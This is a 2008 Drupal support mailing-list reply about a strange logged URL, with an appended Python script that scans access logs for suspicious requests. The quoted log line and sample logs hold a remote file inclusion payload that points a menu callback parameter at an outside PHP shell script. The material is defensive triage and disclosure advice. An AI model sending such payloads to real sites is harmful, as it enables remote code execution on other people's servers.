[support] Strange url from log

Greg Knaddison greg at pingvox.com
Sun Jan 6 19:39:14 UTC 2008


The most important thing here is that when you have a potential
security issue the proper way to submit it is documented on
http://drupal.org/security-team which can also be found via
http://drupal.org/security. If you send the potential exploit to a
public channel like a listserv or the Drupal.org issue queue, then
that makes the job of the security team and all other Drupal users
much harder because everyone has to scramble to find a fix and get it
installed as soon as possible.

On Jan 6, 2008 6:17 PM, michel <michel at ziobudda.net> wrote:
>  drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
>  where http://my3dwork.com/images/on.txt is  a php shell script.
>  any 0-day bug ?

This is not a bug in Drupal per se, but rather a PHP bug.  Because the
Security Team was seeing a few reports of logs like this we decided to
make a "Public Service Announcement" back in October -
http://drupal.org/node/184313. That announcement describes the nature
of the problem and the proper actions to take to prevent the attack
from succeeding on your site.


Greg Knaddison
Denver, CO | http://knaddison.com
World Spanish Tour | http://wanderlusting.org/user/greg
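
The logged request quoted above sets an array-style parameter (`_menu[callbacks][1][callback]`) to a remote URL. The following triage script is an added example, not part of the original message or of Drupal; it assumes combined-format access logs, the function names are hypothetical, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# PHP array-style parameter name, e.g. _menu[callbacks][1][callback]
ARRAY_PARAM = re.compile(r"^[A-Za-z_]\w*(\[[^\]]*\])+$")
# Value that points at a remote resource
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Request field of a combined-format access log line (assumed log format)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return (name, value) pairs where an array-style parameter is set to a remote URL."""
    query = request_target.partition("?")[2]
    # parse_qsl percent-decodes names and values, so encoded variants match too
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True)
            if ARRAY_PARAM.match(n) and REMOTE_VALUE.match(v)]

def scan(lines):
    """Return (client_ip, hits) for every log line containing a suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue  # not a recognisable request line
        hits = suspicious_params(m.group(1))
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings

# Constructed sample log lines (hosts and addresses are placeholders)
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jan/2008:18:02:11 +0000] "GET /drupal/?_menu[callbacks][1]'
    '[callback]=http://files.example/on.txt? HTTP/1.1" 200 5120',
    '203.0.113.8 - - [06/Jan/2008:18:03:40 +0000] "GET /drupal/?%5Fmenu%5Bcallbacks%5D'
    '%5B1%5D%5Bcallback%5D=http%3A%2F%2Ffiles.example%2Fon.txt HTTP/1.1" 200 5120',
    '198.51.100.4 - - [06/Jan/2008:18:04:02 +0000] "GET /drupal/?q=node/12 HTTP/1.1" 200 8034',
    '198.51.100.5 - - [06/Jan/2008:18:05:19 +0000] "GET /drupal/?q=user/login'
    '&destination=http://www.example/ HTTP/1.1" 200 3011',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        for name, value in hits:
            print(f"{client} sets {name} to {value}")
```

A hit only shows that the request was attempted; whether it could succeed depends on the PHP configuration described in the announcement linked above.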
